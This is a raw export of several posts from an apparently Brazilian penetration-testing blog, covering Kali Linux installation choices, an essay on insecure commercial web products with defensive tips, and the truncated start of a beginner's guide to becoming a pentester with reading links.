href="https://www.blogger.com/blogger.g?blogID=2185986060583872831" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a>So in short, if
the hash algorithm used is vulnerable, it is possible to achieve this without
knowing the secret value as long as you know (or can guess, perhaps by brute
force) the length of that secret value. This is called a hash length extension
attack.</div>
<br />
<div class="MsoNormal" style="margin-top: 12.0pt; text-align: justify;">
<b><span style="font-size: 20.0pt; line-height: 115%; mso-bidi-font-size: 11.0pt;">Happy Hacking my Friends!!!<o:p></o:p></span></b></div>
</div>
Anonymoushttp://www.blogger.com/profile/16674553366705399324noreply@blogger.com0tag:blogger.com,1999:blog-2185986060583872831.post-8820562585923473102016-05-18T11:51:00.000-07:002016-06-06T06:21:19.452-07:00Kali linux: BareMetal, Virtualized or USB Stick<div class="MsoNormal">
</div>
<br />
<br />
<br />
<div style="text-align: center;">
<img src="https://www.kali.org/wp-content/uploads/2015/07/kali-vm-images.png" /></div>
<div style="text-align: left;">
<div class="MsoNormal">
<span lang="EN-US">Few days
ago, we had a discussion about what is the best approach for Kali Linux
installation. <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">A lot of
guys complain about the performance in virtualized installations - I have one
word for that: <span style="color: red;"><b>BULLSHIT!</b></span><br /><br /><o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">I have almost 10 years of pentesting/security
experience and I have never problems with virtualized installation, except for
some years ago with Wi-Fi dongles (We will discuss it later).<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">Based in my
observations to where and when to install, here are few ideas to follow:<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br /><b>- New in
Linux: </b><o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">If you are
new, you should not start with Kali, go back and read this article first:
http://blog.dclabs.com.br/2016/05/wanna-be-pentester.html and related links. <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">From this
point I will assume that you have Linux and security skills. <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">As was
described in the link above, Kali is not for general purpose or day by day
distro, so, here is the first point:<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br />- As Kali
is not a day by day distro, some applications like Skype, Flash player and
others are not supported by Kali Team, in other words, non-official/external
repositories can be added in your Kali in order to install tools/packets.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">Also, in
Kali there are tools like calendars, agenda and stuff, but these tools are not
priority.<br />
In case of problems with this kind of application, for sure you have to wait a
long time to get it fixed. <br /><br />Obliviously,
the best approach is to use Kali virtualized in your daily distro or Windows.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br />But before
installing it, please RTFM (Read the Fucking Manual)! Is very common for people
to complain about errors during the installation and performance. Of course,
they are not following the basic recommendations.
http://docs.kali.org/installation/kali-linux-hard-disk-install - Check all
requirements before starting! <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br />If you are
planning to use Gnome as your default desktop environment, you need more RAM
memory. <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br />I recommend
XFCE, because you are a Pentester and not a Designer.<br />
If you want something cute, forget Kali and install HannaMontana Linux.
http://hannahmontana.sourceforge.net/ -> Just to help you! (:<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br /><b>-
Performance: </b><o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">If you
follow the requirements, the likelihood of facing problems is very low.
Nowadays, machines have a very powerful processors, very good memory and disk
size, so it is easy to allocate some of these resources to a VM. However, if
your machine does not have good hardware specifications (maybe it is time to
throw it away and buy a new one) I recommend the bare metal installation. <br /><br />This
way kali is able to use the complete machine hardware resources and it will not
be shared with another OS. <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br /><b>- System
restoring and backup</b><o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">If you have
minimum skills regarding virtualization, you know that making virtual machines
backup/restore is easier than a bare metal installation - you only need to copy
a couple of files and that´s it. <br /><br />Also, you can revert to the last snapshot, the
system will be up in few minutes or less.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">For bare
metal breaking, you need to check logs, files, disk healthy and stuff. Or, in
the worst case, install the system again. It’s really not a good thing if you
are inside a customer for example. <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br /><b>-Mobility</b><o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">If you have
a dedicated hardware to perform pestest for customers, is a good idea to have it
bare metal. However, is possible to face some hardware compatibility problems, it will be discussed in the next topic.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br />Nevertheless,
if you don’t have a dedicated hardware and carrying a notebook is not an
option, you can use OVF format (https://en.wikipedia.org/wiki/Open_Virtualization_Format). <br />Just put the file in a
pendrive and load it in the Vbox or Vmware for example. <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br />Another
option is to create a bootable pendrive, also, the mobility in this
case is easier than carrying a notebook in the bag all the time.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br />Following
the links related to USB install:<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><a href="http://docs.kali.org/downloading/kali-linux-live-usb-install">http://docs.kali.org/downloading/kali-linux-live-usb-install</a><br />
<a href="http://docs.kali.org/downloading/kali-linux-live-usb-persistence">http://docs.kali.org/downloading/kali-linux-live-usb-persistence</a><br />
<br />
One more, but not powerful option is to install Kali in your mobile device,
there is a especial Kali edition called NetHunter
(https://www.kali.org/kali-linux-nethunter/) for this purpose.<br />Also, you can
proceed with a chroot installation
(https://www.kali.org/tutorials/kali-linux-android-linux-deploy/)<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br />This last
two cases are very useful when you are performing a pentest with very restrict
devices access. I mean, when the customer does not allow you to go inside the
company with your notebook. Normally mobiles devices are allowed and pendrives are very
easy to hide. <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br /><b>-Hardware
compatibility</b><o:p></o:p></span></div>
If you dont wanna face hardware problems, the best way is to use virtual system. <div class="MsoNormal">
<span lang="EN-US">Only one
problem in my point of view (and it not is that problem): <br />You are not
able to use your GPU to crack passwords. </span></div>
<div class="MsoNormal">
<span lang="EN-US"><br />You still able to use virtualized to
crack, but for sure not the same speed. <br />However, the passwords
can be cracked in your normal Linux/windows installation, don’t try to use this
"problem" as excuse to have Kali bare metal installed and look cool
for your friends.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br />For Wi-Fi
penetration tests, some years ago I had some problems because VMware and Vbox
didn’t have a nice USB management, nowadays, it already fixed. <br />Basically 99% of
the problems with Wi-Fi pentesting are because the Wi-Fi card does not support
packet injection, so, check it before buying the Wi-Fi adapter.<o:p></o:p></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="EN-US"><u><b>Conclusion:
</b></u><br /><br /><o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US">A virtualized Kali will work pretty nice for you, covering almost all the cases.<br />If it is not
working with satisfactory performance, maybe you did something wrong.<o:p></o:p></span></div>
<br />
<div class="MsoNormal">
<span lang="EN-US">Probably I
didn’t cover all possibilities ins the article, but I hope it helps you to choose the best way
to install your Kali.<o:p></o:p></span></div>
</div>
Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-2185986060583872831.post-72236026365038236502016-05-18T01:44:00.002-07:002016-05-18T01:53:10.193-07:00 Compromising Security using Online Products<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
A big Hi to the online world out there! Since I don’t write much, let me first introduce myself. My name is Bikramaditya Guha aka PhoenixX and I'm an Indian Computer Enthusiast. These days I mostly work with information security, with a special interest in Web Applications. If you let me, I'll find my ways into your site or application, hopefully before the bad guys do. You can find a little more about me by visiting my <a href="https://www.linkedin.com/in/bikramaditya">LinkedIn</a> profile.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
It's very common these days to find and exploit zero days. Some of them are really intriguing based on the popularity of the products and their usage.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
It has been observed that a lot of costly products (and by that I mean really costly) sold to the general public/corporations are not tested for security or to say the least, tested with negligence. It's 2016 and security still serves only as a mean to fulfill compliance requirements. Everybody seems to be in a hurry to release the product to the end users. It seems like the value of money is still more important than an individual's personal data.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Today I want to share a tale about how I started pawning shells across multiple demo products (mostly PHP based). Like all good tales, this one also begins long time ago (actually about a year).</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Given that every organization or individual are becoming increasingly dependent on a one-click solution for all their problems, multiple (small and big) vendors are spawning up with online solutions/products to ease the pressure out of big MNCs. Though it saves you a lot of money, it raises a troubling question.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Are the products really secure? Do they really care about the reputation you carry? Or is it just a sprint for money?</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
These questions really raise an eyebrow (being paranoid helps when it comes to personal data) and then I decided to explore these products from a security perspective. And guess what!!! I felt like I can train junior pentesters to be hackers by using these online demos, the vendors offer, as a training ground. Or in short, nobody gives a 'Fish' about security. There's an open vulnerable world out in the wild ready to be PWNED.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In my recent researches, I have observed that a lot of popular products (CMS, LMS, WMS, etc.) wildly used in the market are prone to some serious vulnerabilities. 6 out of 10 major organizations which use these products are vulnerable to flaws which include but are not limited to SQL Injection, Remote Code Execution, LFI, XXE, XSS, etc. This is just a small example considering the enormousness of the online world.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The web's architecture, having become so important that many confuse it with the internet itself, is also problematic from a security standpoint. The web uses client-server architecture on a peer to peer network. The web and the internet pass messages asynchronously, essentially a file transfer system.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Each time you visit a website you open the door to your computer through which the site can send files. All of these separate files have been used by criminals and other evil doers to harm computer users.</div>
<ul style="text-align: left;">
<li style="text-align: justify;">Your identity can be stolen for financial fraud.</li>
<li style="text-align: justify;">You can be redirected to phony sites and sold fake products.</li>
<li style="text-align: justify;">Your computer can be controlled for nefarious schemes using vulnerabilities in Flash and Java.</li>
</ul>
<div style="text-align: justify;">
Worse, the peer to peer nature of the internet means that a network is only as vulnerable as its weakest link. Too often, network administrators and users are complacent about a computer or website because it is by itself insignificant. Why add SSL to a test website on a minor project? Why add a firewall to a computer that does not have significant data on it?</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
These questions are often answered the hard way. When hackers gain access to one computer on a network they can work their way onto other computers on the network. Drop a sniffer on one computer and you can eventually identify the login credentials to access other computers. With patience and persistence, hackers can move from a low priority computer with minimal access rights to more important computers with higher levels of access. Get root privileges, own the system/server. There's a hell lot of other things a hacker is equipped with to throw at your personally owned beloved system. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The main purpose of this article is to instill among the individuals the necessity and importance of security in whatever they do or try to do online. Be it using an online product, surfing on the internet, or playing online games, whatever. Being cautious doesn't harm. It definitely helps against such sophisticated and cleverly planned attacks. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In my work experience, I just don’t see organizations/individuals paying much of a heed to security. So in case you find this article interesting, I would recommend few things that might help you to improve security (only if you care enough).</div>
<ol style="text-align: left;">
<li style="text-align: justify;">Protect your network with a robust hardware-based firewall, at the same time keep personal firewalls on all computers. A layered approach to network security is essential.</li>
<li style="text-align: justify;">Use remote management tools to ensure that all computers on your network have an up to date firewall and antivirus program correctly configured.</li>
<li style="text-align: justify;">Restrict user’s rights to install software. I hate this myself, but it is important. When you give everyone installation rights you are giving it to the malware they download!</li>
<li style="text-align: justify;">Use Firefox instead of Internet Explorer. It may not be practical to migrate away from Windows, but you can do a lot of good by using the much more secure Firefox.</li>
<li style="text-align: justify;">Identify and secure all access points, no matter how seemingly insignificant. Every web site, every ftp server that can be accessed via the public internet needs to be secured and monitored for compromises.</li>
<li style="text-align: justify;">Require strong passwords for your computers and applications. This is another one I hate, but weak passwords are the best friend of every hacker.</li>
<li style="text-align: justify;">Last but not the least! Watch over your shoulder.</li>
</ol>
<div style="text-align: justify;">
Given the nature of the internet, network security is a never ending battle that requires constant vigilance. Best of luck….</div>
</div>
Anonymoushttp://www.blogger.com/profile/16674553366705399324noreply@blogger.com0tag:blogger.com,1999:blog-2185986060583872831.post-59357628001603568732016-05-01T06:40:00.015-07:002023-02-10T08:03:08.190-08:00Wanna be pentester<p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Hi guys!</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>So, if you are reading this, I'm dead! Lol kidding.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Seriously now, if you are reading this, you are trying to become a pentester and not a stupid teenager who just wants to run a tool and tell his friends that he is a hacker.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Also, if you are concerned/complaining about the icon size on your desktop, your sound card is not working in Kali Linux, or you are too lazy to read it, go back to your everyday life. You don't have the pentester/hacker soul.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>If you are still reading at this point, I already suppose that you have at least the basic knowledge of:</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>- Linux operation and management</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>- Windows operation and management</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>- Some programming language skills (Perl, python, ruby, javascript) also, for web pentest event HTML is required, even if it isn't a programming language</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>- Basic Network knowledge (TCP/IP, ICMP) /Network services (Proxy, VPN, Samba, AD)</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>- Protocols like HTTP, FTP, DNS, SSH</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>- SQL (DDL, DML, and so on), MySQL, SQL Server, Postgres, Oracle.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>- NoSQL - MongoDB, and others.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>If you don't have these skills, don't try to get into the security world at this moment, or you will get frustrated. You will need a lot of reading before you can start it.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Don't think just installing Kali Linux on your machine magically makes you a pentester. It takes time, and to be honest, a lot of time!</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>If you want to learn Linux, don't start with Kali for the following reasons: http://docs.kali.org/introduction/should-i-use-kali-linux. Basically, these lines: "The fact of the matter is, however, that Kali is a Linux distribution specifically geared towards professional penetration testers and security specialists, and given its unique nature, it is NOT a recommended distribution if you're unfamiliar with Linux or are looking for a general-purpose Linux desktop distribution for development, web design, gaming, etc."</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>The most important thing is: Know how things work.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>I will not discuss the guys who use SET to grab Facebook credentials. I know a lot of "hackers" who can dump entire databases, but they don't even know how a SELECT or CREATE TABLE statement works, or guys who can take down a server, but they don't even know what an ICMP type 8 is. I felt sick writing this last sentence…</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>So, don't be big-headed. Just executing tools does not make you a hacker/pentester. Correctly start your studies.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Don't be a simple stupid script, kiddie. These guys are jokes in the security world. Do you wanna be like these guys? I don't think so.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>And another tip: Don't think that everything is for free. You'll need to save money to buy books, training, or certifications.</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>There is a lot of training available on the internet. I'm saving some time for you:</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>Here are some books and links to start (I put them in the order that I think is the best way to learn, feel free to choose the best way for you):</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://en.wikipedia.org/wiki/Modern_Operating_Systems</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://iips.icci.edu.iq/images/exam/Computer-Networks---A-Tanenbaum---5th-edition.pdf</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.amazon.com/HTTP-Definitive-Guide-Guides/dp/1565925092</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.edx.org/course/introduction-linux-linuxfoundationx-lfs101x-0</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://linuxacademy.com/linux</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://linux-training.be/</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.htmlandcssbook.com/</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://en.wikiversity.org/wiki/Programming_Logic</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.python.org/about/gettingstarted/</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://www.perl.org/books/beginning-perl/</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>http://www.sqlcourse.com/</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span>https://go.dev/</span></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span><br /></span></p><p style="background-attachment: initial; background-clip: initial; background-image: initial; background-origin: initial; background-position: initial; background-repeat: initial; background-size: initial; margin-bottom: 0pt; margin-top: 0pt;"><span data-preserver-spaces="true" style="background-attachment: initial; 